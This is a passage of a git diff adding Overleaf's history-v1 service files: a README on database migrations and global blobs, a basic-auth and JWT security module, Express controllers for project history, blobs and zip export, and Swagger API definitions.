test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/history-v1/README.md b/services/history-v1/README.md new file mode 100644 index 0000000..9591159 --- /dev/null +++ b/services/history-v1/README.md @@ -0,0 +1,51 @@ +## Database migrations + +The history service uses knex to manage PostgreSQL migrations. + +To create a new migrations, run: +``` +npx knex migrate:make migration_name +``` + +To apply migrations, run: +``` +npx knex migrate:latest +``` + +For more information, consult the [knex migrations +guide](https://knexjs.org/guide/migrations.html#migration-cli). + +## Global blobs + +Global blobs are blobs that are shared between projects. The list of global +blobs is stored in the projectHistoryGlobalBlobs Mongo collection and is read +when the service starts. Changing the list of global blobs needs to be done +carefully. + +### Adding a blob to the global blobs list + +If we identify a blob that appears in many projects, we might want to move that +blob to the global blobs list. + +1. Add a record for the blob to the projectHistoryGlobalBlobs collection. +2. Restart the history service. +3. Delete any corresponding project blobs. + +### Removing a blob from the global blobs list + +Removing a blob from the global blobs list is trickier. As soon as the global +blob is made unavailable, every project that needs the blob will have to get +its own copy. To avoid disruptions, follow these steps: + +1. In the projectHistoryGlobalBlobs collection, set the `demoted` property to + `false` on the global blob to remove. This will make the history system + write new instances of this blob to project blobs, but still read from the + global blob. + +2. Restart the history service. + +3. Copy the blob to all projects that need it. + +4. Remove the blob from the projectHistoryGlobalBlobs collection. + +5. Restart the history service. diff --git a/services/history-v1/api/app/security.js b/services/history-v1/api/app/security.js new file mode 100644 index 0000000..08d6f03 --- /dev/null +++ b/services/history-v1/api/app/security.js @@ -0,0 +1,149 @@ +'use strict' + +const basicAuth = require('basic-auth') +const config = require('config') +const HTTPStatus = require('http-status') +const jwt = require('jsonwebtoken') +const tsscmp = require('tsscmp') + +function setupBasicHttpAuthForSwaggerDocs(app) { + app.use('/docs', function (req, res, next) { + if (hasValidBasicAuthCredentials(req)) { + return next() + } + + res.header('WWW-Authenticate', 'Basic realm="Application"') + res.status(HTTPStatus.UNAUTHORIZED).end() + }) +} + +exports.setupBasicHttpAuthForSwaggerDocs = setupBasicHttpAuthForSwaggerDocs + +function hasValidBasicAuthCredentials(req) { + const credentials = basicAuth(req) + if (!credentials) return false + + // No security in the name, so just use straight comparison. + if (credentials.name !== 'staging') return false + + const password = config.get('basicHttpAuth.password') + if (password && tsscmp(credentials.pass, password)) return true + + // Support an old password so we can change the password without downtime. + if (config.has('basicHttpAuth.oldPassword')) { + const oldPassword = config.get('basicHttpAuth.oldPassword') + if (oldPassword && tsscmp(credentials.pass, oldPassword)) return true + } + + return false +} + +function setupSSL(app) { + const httpsOnly = config.get('httpsOnly') === 'true' + if (!httpsOnly) { + return + } + app.enable('trust proxy') + app.use(function (req, res, next) { + if (req.protocol === 'https') { + next() + return + } + if (req.method === 'GET' || req.method === 'HEAD') { + res.redirect('https://' + req.headers.host + req.url) + } else { + res + .status(HTTPStatus.FORBIDDEN) + .send('Please use HTTPS when submitting data to this server.') + } + }) +} + +exports.setupSSL = setupSSL + +function handleJWTAuth(req, authOrSecDef, scopesOrApiKey, next) { + // as a temporary solution, to make the OT demo still work + // this handler will also check for basic authorization + if (hasValidBasicAuthCredentials(req)) { + return next() + } + let token, err + if (authOrSecDef.name === 'token') { + token = req.query.token + } else if ( + req.headers.authorization && + req.headers.authorization.split(' ')[0] === 'Bearer' + ) { + token = req.headers.authorization.split(' ')[1] + } + if (!token) { + err = new Error('jwt missing') + err.statusCode = HTTPStatus.UNAUTHORIZED + err.headers = { 'WWW-Authenticate': 'Bearer' } + return next(err) + } + let decoded + try { + decoded = decodeJWT(token) + } catch (error) { + if ( + error instanceof jwt.JsonWebTokenError || + error instanceof jwt.TokenExpiredError + ) { + err = new Error(error.message) + err.statusCode = HTTPStatus.UNAUTHORIZED + err.headers = { 'WWW-Authenticate': 'Bearer error="invalid_token"' } + return next(err) + } + throw error + } + if (decoded.project_id.toString() !== req.swagger.params.project_id.value) { + err = new Error('Wrong project_id') + err.statusCode = HTTPStatus.FORBIDDEN + return next(err) + } + next() +} + +exports.hasValidBasicAuthCredentials = hasValidBasicAuthCredentials + +/** + * Verify and decode the given JSON Web Token + */ +function decodeJWT(token) { + const key = config.get('jwtAuth.key') + const algorithm = config.get('jwtAuth.algorithm') + try { + return jwt.verify(token, key, { algorithms: [algorithm] }) + } catch (err) { + // Support an old key so we can change the key without downtime. + if (config.has('jwtAuth.oldKey')) { + const oldKey = config.get('jwtAuth.oldKey') + return jwt.verify(token, oldKey, { algorithms: [algorithm] }) + } else { + throw err + } + } +} +function handleBasicAuth(req, authOrSecDef, scopesOrApiKey, next) { + if (hasValidBasicAuthCredentials(req)) { + return next() + } + const error = new Error() + error.statusCode = HTTPStatus.UNAUTHORIZED + error.headers = { 'WWW-Authenticate': 'Basic realm="Application"' } + return next(error) +} + +function getSwaggerHandlers() { + const handlers = {} + if (!config.has('jwtAuth.key') || !config.has('basicHttpAuth.password')) { + throw new Error('missing authentication env vars') + } + handlers.jwt = handleJWTAuth + handlers.basic = handleBasicAuth + handlers.token = handleJWTAuth + return handlers +} + +exports.getSwaggerHandlers = getSwaggerHandlers diff --git a/services/history-v1/api/controllers/expressify.js b/services/history-v1/api/controllers/expressify.js new file mode 100644 index 0000000..5eee15f --- /dev/null +++ b/services/history-v1/api/controllers/expressify.js @@ -0,0 +1,10 @@ +/** + * Turn an async function into an Express middleware + */ +function expressify(fn) { + return (req, res, next) => { + fn(req, res, next).catch(next) + } +} + +module.exports = expressify diff --git a/services/history-v1/api/controllers/health_checks.js b/services/history-v1/api/controllers/health_checks.js new file mode 100644 index 0000000..e9f7176 --- /dev/null +++ b/services/history-v1/api/controllers/health_checks.js @@ -0,0 +1,23 @@ +const logger = require('@overleaf/logger') +const expressify = require('./expressify') +const { mongodb } = require('../../storage') + +async function status(req, res) { + try { + await mongodb.db.command({ ping: 1 }) + } catch (err) { + logger.warn({ err }, 'Lost connection with MongoDB') + res.status(500).send('Lost connection with MongoDB') + return + } + res.send('history-v1 is up') +} + +function healthCheck(req, res) { + res.send('OK') +} + +module.exports = { + status: expressify(status), + healthCheck, +} diff --git a/services/history-v1/api/controllers/project_import.js b/services/history-v1/api/controllers/project_import.js new file mode 100644 index 0000000..5dec84d --- /dev/null +++ b/services/history-v1/api/controllers/project_import.js @@ -0,0 +1,141 @@ +// @ts-check + +'use strict' + +const { expressify } = require('@overleaf/promise-utils') + +const HTTPStatus = require('http-status') + +const core = require('overleaf-editor-core') +const Change = core.Change +const Chunk = core.Chunk +const File = core.File +const FileMap = core.FileMap +const Snapshot = core.Snapshot +const TextOperation = core.TextOperation + +const logger = require('@overleaf/logger') + +const storage = require('../../storage') +const BatchBlobStore = storage.BatchBlobStore +const BlobStore = storage.BlobStore +const chunkStore = storage.chunkStore +const HashCheckBlobStore = storage.HashCheckBlobStore +const persistChanges = storage.persistChanges +const InvalidChangeError = storage.InvalidChangeError + +const render = require('./render') + +async function importSnapshot(req, res) { + const projectId = req.swagger.params.project_id.value + const rawSnapshot = req.swagger.params.snapshot.value + + let snapshot + + try { + snapshot = Snapshot.fromRaw(rawSnapshot) + } catch (err) { + return render.unprocessableEntity(res) + } + + let historyId + try { + historyId = await chunkStore.initializeProject(projectId, snapshot) + } catch (err) { + if (err instanceof chunkStore.AlreadyInitialized) { + return render.conflict(res) + } else { + throw err + } + } + + res.status(HTTPStatus.OK).json({ projectId: historyId }) +} + +async function importChanges(req, res, next) { + const projectId = req.swagger.params.project_id.value + const rawChanges = req.swagger.params.changes.value + const endVersion = req.swagger.params.end_version.value + const returnSnapshot = req.swagger.params.return_snapshot.value || 'none' + + let changes + + try { + changes = rawChanges.map(Change.fromRaw) + } catch (err) { + logger.warn({ err, projectId }, 'failed to parse changes') + return render.unprocessableEntity(res) + } + + // Set limits to force us to persist all of the changes. + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + const limits = { + maxChanges: 0, + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + + const blobStore = new BlobStore(projectId) + const batchBlobStore = new BatchBlobStore(blobStore) + const hashCheckBlobStore = new HashCheckBlobStore(blobStore) + + async function loadFiles() { + const blobHashes = new Set() + for (const change of changes) { + // This populates the set blobHashes with blobs referred to in the change + change.findBlobHashes(blobHashes) + } + + await batchBlobStore.preload(Array.from(blobHashes)) + + for (const change of changes) { + await change.loadFiles('lazy', batchBlobStore) + } + } + + async function buildResultSnapshot(resultChunk) { + const chunk = resultChunk || (await chunkStore.loadLatest(projectId)) + const snapshot = chunk.getSnapshot() + snapshot.applyAll(chunk.getChanges()) + const rawSnapshot = await snapshot.store(hashCheckBlobStore) + return rawSnapshot + } + + await loadFiles() + + let result + try { + result = await persistChanges(projectId, changes, limits, endVersion) + } catch (err) { + if ( + err instanceof Chunk.ConflictingEndVersion || + err instanceof TextOperation.UnprocessableError || + err instanceof File.NotEditableError || + err instanceof FileMap.PathnameError || + err instanceof Snapshot.EditMissingFileError || + err instanceof chunkStore.ChunkVersionConflictError || + err instanceof InvalidChangeError + ) { + // If we failed to apply operations, that's probably because they were + // invalid. + logger.warn({ err, projectId, endVersion }, 'changes rejected by history') + return render.unprocessableEntity(res) + } else if (err instanceof Chunk.NotFoundError) { + logger.warn({ err, projectId }, 'chunk not found') + return render.notFound(res) + } else { + throw err + } + } + + if (returnSnapshot === 'none') { + res.status(HTTPStatus.CREATED).json({}) + } else { + const rawSnapshot = await buildResultSnapshot(result && result.currentChunk) + res.status(HTTPStatus.CREATED).json(rawSnapshot) + } +} + +exports.importSnapshot = expressify(importSnapshot) +exports.importChanges = expressify(importChanges) diff --git a/services/history-v1/api/controllers/projects.js b/services/history-v1/api/controllers/projects.js new file mode 100644 index 0000000..6770758 --- /dev/null +++ b/services/history-v1/api/controllers/projects.js @@ -0,0 +1,388 @@ +'use strict' + +const _ = require('lodash') +const Path = require('node:path') +const Stream = require('node:stream') +const HTTPStatus = require('http-status') +const fs = require('node:fs') +const { promisify } = require('node:util') +const config = require('config') +const OError = require('@overleaf/o-error') + +const logger = require('@overleaf/logger') +const { Chunk, ChunkResponse, Blob } = require('overleaf-editor-core') +const { + BlobStore, + blobHash, + chunkStore, + HashCheckBlobStore, + ProjectArchive, + zipStore, + chunkBuffer, +} = require('../../storage') + +const render = require('./render') +const expressify = require('./expressify') +const withTmpDir = require('./with_tmp_dir') +const StreamSizeLimit = require('./stream_size_limit') + +const pipeline = promisify(Stream.pipeline) + +async function initializeProject(req, res, next) { + let projectId = req.swagger.params.body.value.projectId + try { + projectId = await chunkStore.initializeProject(projectId) + res.status(HTTPStatus.OK).json({ projectId }) + } catch (err) { + if (err instanceof chunkStore.AlreadyInitialized) { + render.conflict(res) + } else { + throw err + } + } +} + +async function getLatestContent(req, res, next) { + const projectId = req.swagger.params.project_id.value + const blobStore = new BlobStore(projectId) + const chunk = await chunkBuffer.loadLatest(projectId) + const snapshot = chunk.getSnapshot() + snapshot.applyAll(chunk.getChanges()) + await snapshot.loadFiles('eager', blobStore) + res.json(snapshot.toRaw()) +} + +async function getContentAtVersion(req, res, next) { + const projectId = req.swagger.params.project_id.value + const version = req.swagger.params.version.value + const blobStore = new BlobStore(projectId) + const snapshot = await getSnapshotAtVersion(projectId, version) + await snapshot.loadFiles('eager', blobStore) + res.json(snapshot.toRaw()) +} + +async function getLatestHashedContent(req, res, next) { + const projectId = req.swagger.params.project_id.value + const blobStore = new HashCheckBlobStore(new BlobStore(projectId)) + const chunk = await chunkBuffer.loadLatest(projectId) + const snapshot = chunk.getSnapshot() + snapshot.applyAll(chunk.getChanges()) + await snapshot.loadFiles('eager', blobStore) + const rawSnapshot = await snapshot.store(blobStore) + res.json(rawSnapshot) +} + +async function getLatestHistory(req, res, next) { + const projectId = req.swagger.params.project_id.value + try { + const chunk = await chunkBuffer.loadLatest(projectId) + const chunkResponse = new ChunkResponse(chunk) + res.json(chunkResponse.toRaw()) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + throw err + } + } +} + +async function getLatestHistoryRaw(req, res, next) { + const projectId = req.swagger.params.project_id.value + const readOnly = req.swagger.params.readOnly.value + try { + const { startVersion, endVersion, endTimestamp } = + await chunkStore.loadLatestRaw(projectId, { readOnly }) + res.json({ + startVersion, + endVersion, + endTimestamp, + }) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + throw err + } + } +} + +async function getHistory(req, res, next) { + const projectId = req.swagger.params.project_id.value + const version = req.swagger.params.version.value + try { + const chunk = await chunkStore.loadAtVersion(projectId, version) + const chunkResponse = new ChunkResponse(chunk) + res.json(chunkResponse.toRaw()) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + throw err + } + } +} + +async function getHistoryBefore(req, res, next) { + const projectId = req.swagger.params.project_id.value + const timestamp = req.swagger.params.timestamp.value + try { + const chunk = await chunkStore.loadAtTimestamp(projectId, timestamp) + const chunkResponse = new ChunkResponse(chunk) + res.json(chunkResponse.toRaw()) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + throw err + } + } +} + +/** + * Get all changes since the beginning of history or since a given version + */ +async function getChanges(req, res, next) { + const projectId = req.swagger.params.project_id.value + const since = req.swagger.params.since.value ?? 0 + + if (since < 0) { + // Negative values would cause an infinite loop + return res.status(400).json({ + error: `Version out of bounds: ${since}`, + }) + } + + const changes = [] + let chunk = await chunkBuffer.loadLatest(projectId) + + if (since > chunk.getEndVersion()) { + return res.status(400).json({ + error: `Version out of bounds: ${since}`, + }) + } + + // Fetch all chunks that come after the chunk that contains the start version + while (chunk.getStartVersion() > since) { + const changesInChunk = chunk.getChanges() + changes.unshift(...changesInChunk) + chunk = await chunkStore.loadAtVersion(projectId, chunk.getStartVersion()) + } + + // Extract the relevant changes from the chunk that contains the start version + const changesInChunk = chunk + .getChanges() + .slice(since - chunk.getStartVersion()) + changes.unshift(...changesInChunk) + + res.json(changes.map(change => change.toRaw())) +} + +async function getZip(req, res, next) { + const projectId = req.swagger.params.project_id.value + const version = req.swagger.params.version.value + const blobStore = new BlobStore(projectId) + + let snapshot + try { + snapshot = await getSnapshotAtVersion(projectId, version) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + return render.notFound(res) + } else { + throw err + } + } + + await withTmpDir('get-zip-', async tmpDir => { + const tmpFilename = Path.join(tmpDir, 'project.zip') + const archive = new ProjectArchive(snapshot) + await archive.writeZip(blobStore, tmpFilename) + res.set('Content-Type', 'application/octet-stream') + res.set('Content-Disposition', 'attachment; filename=project.zip') + const stream = fs.createReadStream(tmpFilename) + await pipeline(stream, res) + }) +} + +async function createZip(req, res, next) { + const projectId = req.swagger.params.project_id.value + const version = req.swagger.params.version.value + try { + const snapshot = await getSnapshotAtVersion(projectId, version) + const zipUrl = await zipStore.getSignedUrl(projectId, version) + // Do not await this; run it in the background. + zipStore.storeZip(projectId, version, snapshot).catch(err => { + logger.error({ err, projectId, version }, 'createZip: storeZip failed') + }) + res.status(HTTPStatus.OK).json({ zipUrl }) + } catch (error) { + if (error instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + next(error) + } + } +} + +async function deleteProject(req, res, next) { + const projectId = req.swagger.params.project_id.value + const blobStore = new BlobStore(projectId) + await Promise.all([ + chunkStore.deleteProjectChunks(projectId), + blobStore.deleteBlobs(), + ]) + res.status(HTTPStatus.NO_CONTENT).send() +} + +async function createProjectBlob(req, res, next) { + const projectId = req.swagger.params.project_id.value + const expectedHash = req.swagger.params.hash.value + const maxUploadSize = parseInt(config.get('maxFileUploadSize'), 10) + + await withTmpDir('blob-', async tmpDir => { + const tmpPath = Path.join(tmpDir, 'content') + const sizeLimit = new StreamSizeLimit(maxUploadSize) + await pipeline(req, sizeLimit, fs.createWriteStream(tmpPath)) + if (sizeLimit.sizeLimitExceeded) { + return render.requestEntityTooLarge(res) + } + const hash = await blobHash.fromFile(tmpPath) + if (hash !== expectedHash) { + logger.debug({ hash, expectedHash }, 'Hash mismatch') + return render.conflict(res, 'File hash mismatch') + } + + const blobStore = new BlobStore(projectId) + const newBlob = await blobStore.putFile(tmpPath) + + try { + const { backupBlob } = await import('../../storage/lib/backupBlob.mjs') + await backupBlob(projectId, newBlob, tmpPath) + } catch (error) { + logger.warn({ error, projectId, hash }, 'Failed to backup blob') + } + res.status(HTTPStatus.CREATED).end() + }) +} + +async function headProjectBlob(req, res) { + const projectId = req.swagger.params.project_id.value + const hash = req.swagger.params.hash.value + + const blobStore = new BlobStore(projectId) + const blob = await blobStore.getBlob(hash) + if (blob) { + res.set('Content-Length', blob.getByteLength()) + res.status(200).end() + } else { + res.status(404).end() + } +} + +// Support simple, singular ranges starting from zero only, up-to 2MB = 2_000_000, 7 digits +const RANGE_HEADER = /^bytes=0-(\d{1,7})$/ + +/** + * @param {string} header + * @return {{}|{start: number, end: number}} + * @private + */ +function _getRangeOpts(header) { + if (!header) return {} + const match = header.match(RANGE_HEADER) + if (match) { + const end = parseInt(match[1], 10) + return { start: 0, end } + } + return {} +} + +async function getProjectBlob(req, res, next) { + const projectId = req.swagger.params.project_id.value + const hash = req.swagger.params.hash.value + const opts = _getRangeOpts(req.swagger.params.range.value || '') + + const blobStore = new BlobStore(projectId) + logger.debug({ projectId, hash }, 'getProjectBlob started') + try { + let stream + try { + stream = await blobStore.getStream(hash, opts) + } catch (err) { + if (err instanceof Blob.NotFoundError) { + logger.warn({ projectId, hash }, 'Blob not found') + return res.status(404).end() + } else { + throw err + } + } + res.set('Content-Type', 'application/octet-stream') + try { + await pipeline(stream, res) + } catch (err) { + if (err?.code === 'ERR_STREAM_PREMATURE_CLOSE') { + res.end() + } else { + throw OError.tag(err, 'error transferring stream', { projectId, hash }) + } + } + } finally { + logger.debug({ projectId, hash }, 'getProjectBlob finished') + } +} + +async function copyProjectBlob(req, res, next) { + const sourceProjectId = req.swagger.params.copyFrom.value + const targetProjectId = req.swagger.params.project_id.value + const blobHash = req.swagger.params.hash.value + // Check that blob exists in source project + const sourceBlobStore = new BlobStore(sourceProjectId) + const targetBlobStore = new BlobStore(targetProjectId) + const [sourceBlob, targetBlob] = await Promise.all([ + sourceBlobStore.getBlob(blobHash), + targetBlobStore.getBlob(blobHash), + ]) + if (!sourceBlob) { + return render.notFound(res) + } + // Exit early if the blob exists in the target project. + // This will also catch global blobs, which always exist. + if (targetBlob) { + return res.status(HTTPStatus.NO_CONTENT).end() + } + // Otherwise, copy blob from source project to target project + await sourceBlobStore.copyBlob(sourceBlob, targetProjectId) + res.status(HTTPStatus.CREATED).end() +} + +async function getSnapshotAtVersion(projectId, version) { + const chunk = await chunkStore.loadAtVersion(projectId, version) + const snapshot = chunk.getSnapshot() + const changes = _.dropRight( + chunk.getChanges(), + chunk.getEndVersion() - version + ) + snapshot.applyAll(changes) + return snapshot +} + +module.exports = { + initializeProject: expressify(initializeProject), + getLatestContent: expressify(getLatestContent), + getContentAtVersion: expressify(getContentAtVersion), + getLatestHashedContent: expressify(getLatestHashedContent), + getLatestPersistedHistory: expressify(getLatestHistory), + getLatestHistory: expressify(getLatestHistory), + getLatestHistoryRaw: expressify(getLatestHistoryRaw), + getHistory: expressify(getHistory), + getHistoryBefore: expressify(getHistoryBefore), + getChanges: expressify(getChanges), + getZip: expressify(getZip), + createZip: expressify(createZip), + deleteProject: expressify(deleteProject), + createProjectBlob: expressify(createProjectBlob), + getProjectBlob: expressify(getProjectBlob), + headProjectBlob: expressify(headProjectBlob), + copyProjectBlob: expressify(copyProjectBlob), +} diff --git a/services/history-v1/api/controllers/render.js b/services/history-v1/api/controllers/render.js new file mode 100644 index 0000000..d7d3191 --- /dev/null +++ b/services/history-v1/api/controllers/render.js @@ -0,0 +1,17 @@ +'use strict' + +const HTTPStatus = require('http-status') + +function makeErrorRenderer(status) { + return (res, message) => { + res.status(status).json({ message: message || HTTPStatus[status] }) + } +} + +module.exports = { + badRequest: makeErrorRenderer(HTTPStatus.BAD_REQUEST), + notFound: makeErrorRenderer(HTTPStatus.NOT_FOUND), + unprocessableEntity: makeErrorRenderer(HTTPStatus.UNPROCESSABLE_ENTITY), + conflict: makeErrorRenderer(HTTPStatus.CONFLICT), + requestEntityTooLarge: makeErrorRenderer(HTTPStatus.REQUEST_ENTITY_TOO_LARGE), +} diff --git a/services/history-v1/api/controllers/stream_size_limit.js b/services/history-v1/api/controllers/stream_size_limit.js new file mode 100644 index 0000000..f3a1495 --- /dev/null +++ b/services/history-v1/api/controllers/stream_size_limit.js @@ -0,0 +1,26 @@ +const stream = require('node:stream') + +/** + * Transform stream that stops passing bytes through after some threshold has + * been reached. + */ +class StreamSizeLimit extends stream.Transform { + constructor(maxSize) { + super() + this.maxSize = maxSize + this.accumulatedSize = 0 + this.sizeLimitExceeded = false + } + + _transform(chunk, encoding, cb) { + this.accumulatedSize += chunk.length + if (this.accumulatedSize > this.maxSize) { + this.sizeLimitExceeded = true + } else { + this.push(chunk) + } + cb() + } +} + +module.exports = StreamSizeLimit diff --git a/services/history-v1/api/controllers/with_tmp_dir.js b/services/history-v1/api/controllers/with_tmp_dir.js new file mode 100644 index 0000000..a9c2e9f --- /dev/null +++ b/services/history-v1/api/controllers/with_tmp_dir.js @@ -0,0 +1,27 @@ +const fs = require('node:fs') +const fsExtra = require('fs-extra') +const logger = require('@overleaf/logger') +const os = require('node:os') +const path = require('node:path') + +/** + * Create a temporary directory before executing a function and cleaning up + * after. + * + * @param {string} prefix - prefix for the temporary directory name + * @param {Function} fn - async function to call + */ +async function withTmpDir(prefix, fn) { + const tmpDir = await fs.promises.mkdtemp(path.join(os.tmpdir(), prefix)) + try { + await fn(tmpDir) + } finally { + fsExtra.remove(tmpDir).catch(err => { + if (err.code !== 'ENOENT') { + logger.error({ err }, 'failed to delete temporary file') + } + }) + } +} + +module.exports = withTmpDir diff --git a/services/history-v1/api/swagger/index.js b/services/history-v1/api/swagger/index.js new file mode 100644 index 0000000..3702c6e --- /dev/null +++ b/services/history-v1/api/swagger/index.js @@ -0,0 +1,269 @@ +'use strict' + +const _ = require('lodash') +const paths = _.reduce( + [require('./projects').paths, require('./project_import').paths], + _.extend +) + +const securityDefinitions = require('./security_definitions') +module.exports = { + swagger: '2.0', + info: { + title: 'Overleaf Editor API', + description: 'API for the Overleaf editor.', + version: '1.0', + }, + produces: ['application/json'], + basePath: '/api', + paths, + securityDefinitions, + security: [ + { + jwt: [], + }, + ], + definitions: { + Project: { + properties: { + projectId: { + type: 'string', + }, + }, + required: ['projectId'], + }, + File: { + properties: { + hash: { + type: 'string', + }, + byteLength: { + type: 'integer', + }, + stringLength: { + type: 'integer', + }, + }, + }, + Label: { + properties: { + authorId: { + type: 'integer', + }, + text: { + type: 'string', + }, + timestamp: { + type: 'string', + }, + version: { + type: 'integer', + }, + }, + }, + Chunk: { + properties: { + history: { + $ref: '#/definitions/History', + }, + startVersion: { + type: 'number', + }, + }, + }, + ChunkResponse: { + properties: { + chunk: { + $ref: '#/definitions/Chunk', + }, + authors: { + type: 'array', + items: { + $ref: '#/definitions/Author', + }, + }, + }, + }, + ChunkResponseRaw: { + properties: { + startVersion: { + type: 'number', + }, + endVersion: { + type: 'number', + }, + endTimestamp: { + type: 'string', + }, + }, + }, + History: { + properties: { + snapshot: { + $ref: '#/definitions/Snapshot', + }, + changes: { + type: 'array', + items: { + $ref: '#/definitions/Change', + }, + }, + }, + }, + Snapshot: { + properties: { + files: { + type: 'object', + additionalProperties: { + $ref: '#/definitions/File', + }, + }, + }, + required: ['files'], + }, + Change: { + properties: { + timestamp: { + type: 'string', + }, + operations: { + type: 'array', + items: { + $ref: '#/definitions/Operation', + }, + }, + authors: { + type: 'array', + items: { + type: ['integer', 'null'], + }, + }, + v2Authors: { + type: 'array', + items: { + type: ['string', 'null'], + }, + }, + projectVersion: { + type: 'string', + }, + v2DocVersions: { + type: 'object', + additionalProperties: { + $ref: '#/definitions/V2DocVersions', + }, + }, + }, + required: ['timestamp', 'operations'], + }, + V2DocVersions: { + properties: { + pathname: { + type: 'string', + }, + v: { + type: 'integer', + }, + }, + }, + ChangeRequest: { + properties: { + baseVersion: { + type: 'integer', + }, + untransformable: { + type: 'boolean', + }, + operations: { + type: 'array', + items: { + $ref: '#/definitions/Operation', + }, + }, + authors: { + type: 'array', + items: { + type: ['integer', 'null'], + }, + }, + }, + required: ['baseVersion', 'operations'], + }, + ChangeNote: { + properties: { + baseVersion: { + type: 'integer', + }, + change: { + $ref: '#/definitions/Change', + }, + }, + required: ['baseVersion'], + }, + Operation: { + properties: { + pathname: { + type: 'string', + }, + newPathname: { + type: 'string', + }, + blob: { + $ref: '#/definitions/Blob', + }, + textOperation: { + type: 'array', + items: {}, + }, + file: { + $ref: '#/definitions/File', + }, + }, + }, + Error: { + properties: { + message: { + type: 'string', + }, + }, + required: ['message'], + }, + Blob: { + properties: { + hash: { + type: 'string', + }, + }, + required: ['hash'], + }, + Author: { + properties: { + id: { + type: 'integer', + }, + email: { + type: 'string', + }, + name: { + type: 'string', + }, + }, + required: ['id', 'email', 'name'], + }, + SyncState: { + properties: { + synced: { + type: 'boolean', + }, + }, + }, + ZipInfo: { + properties: { + zipUrl: { + type: 'string', + }, + }, + required: ['zipUrl'], + }, + }, +} diff --git a/services/history-v1/api/swagger/project_import.js b/services/history-v1/api/swagger/project_import.js new file mode 100644 index 0000000..a93f42d --- /dev/null +++ b/services/history-v1/api/swagger/project_import.js @@ -0,0 +1,147 @@ +'use strict' + +const importSnapshot = { + 'x-swagger-router-controller': 'project_import', + operationId: 'importSnapshot', + tags: ['ProjectImport'], + description: 'Import a snapshot from the current rails app.', + consumes: ['application/json'], + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'snapshot', + in: 'body', + description: 'Snapshot to import.', + required: true, + schema: { + $ref: '#/definitions/Snapshot', + }, + }, + ], + responses: { + 200: { + description: 'Imported', + }, + 409: { + description: 'Conflict: project already initialized', + }, + 404: { + description: 'No such project exists', + }, + }, + security: [ + { + basic: [], + }, + ], +} + +const importChanges = { + 'x-swagger-router-controller': 'project_import', + operationId: 'importChanges', + tags: ['ProjectImport'], + description: 'Import changes for a project from the current rails app.', + consumes: ['application/json'], + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'end_version', + description: 'end_version of latest persisted chunk', + in: 'query', + required: true, + type: 'number', + }, + { + name: 'return_snapshot', + description: + 'optionally, return a snapshot with the latest hashed content', + in: 'query', + required: false, + type: 'string', + enum: ['hashed', 'none'], + }, + { + name: 'changes', + in: 'body', + description: 'changes to be imported', + required: true, + schema: { + type: 'array', + items: { + $ref: '#/definitions/Change', + }, + }, + }, + ], + responses: { + 201: { + description: 'Created', + schema: { + $ref: '#/definitions/Snapshot', + }, + }, + }, + security: [ + { + basic: [], + }, + ], +} + +const getChanges = { + 'x-swagger-router-controller': 'projects', + operationId: 'getChanges', + tags: ['Project'], + description: 'Get changes applied to a project', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'since', + in: 'query', + description: 'start version', + required: false, + type: 'number', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + type: 'array', + items: { + $ref: '#/definitions/Change', + }, + }, + }, + }, + security: [ + { + basic: [], + }, + ], +} + +exports.paths = { + '/projects/{project_id}/import': { post: importSnapshot }, + '/projects/{project_id}/legacy_import': { post: importSnapshot }, + '/projects/{project_id}/changes': { get: getChanges, post: importChanges }, + '/projects/{project_id}/legacy_changes': { post: importChanges }, +} diff --git a/services/history-v1/api/swagger/projects.js b/services/history-v1/api/swagger/projects.js new file mode 100644 index 0000000..cd4d233 --- /dev/null +++ b/services/history-v1/api/swagger/projects.js @@ -0,0 +1,588 @@ +'use strict' + +const Blob = require('overleaf-editor-core').Blob + +exports.paths = { + '/projects': { + post: { + 'x-swagger-router-controller': 'projects', + operationId: 'initializeProject', + tags: ['Project'], + description: 'Initialize project.', + consumes: ['application/json'], + parameters: [ + { + name: 'body', + in: 'body', + schema: { + type: 'object', + properties: { + projectId: { type: 'string' }, + }, + }, + }, + ], + responses: { + 200: { + description: 'Initialized', + schema: { + $ref: '#/definitions/Project', + }, + }, + }, + security: [ + { + basic: [], + }, + ], + }, + }, + '/projects/{project_id}': { + delete: { + 'x-swagger-router-controller': 'projects', + operationId: 'deleteProject', + tags: ['Project'], + description: "Delete a project's history", + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + ], + responses: { + 204: { + description: 'Success', + }, + }, + security: [ + { + basic: [], + }, + ], + }, + }, + '/projects/{project_id}/blobs/{hash}': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getProjectBlob', + tags: ['Project'], + description: 'Fetch blob content by its project id and hash.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'hash', + in: 'path', + description: 'Hexadecimal SHA-1 hash', + required: true, + type: 'string', + pattern: Blob.HEX_HASH_RX_STRING, + }, + { + name: 'range', + in: 'header', + description: 'HTTP Range header', + required: false, + type: 'string', + }, + ], + produces: ['application/octet-stream'], + responses: { + 200: { + description: 'Success', + schema: { + type: 'file', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + security: [{ jwt: [] }, { token: [] }], + }, + head: { + 'x-swagger-router-controller': 'projects', + operationId: 'headProjectBlob', + tags: ['Project'], + description: 'Fetch blob content-length by its project id and hash.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'hash', + in: 'path', + description: 'Hexadecimal SHA-1 hash', + required: true, + type: 'string', + pattern: Blob.HEX_HASH_RX_STRING, + }, + ], + produces: 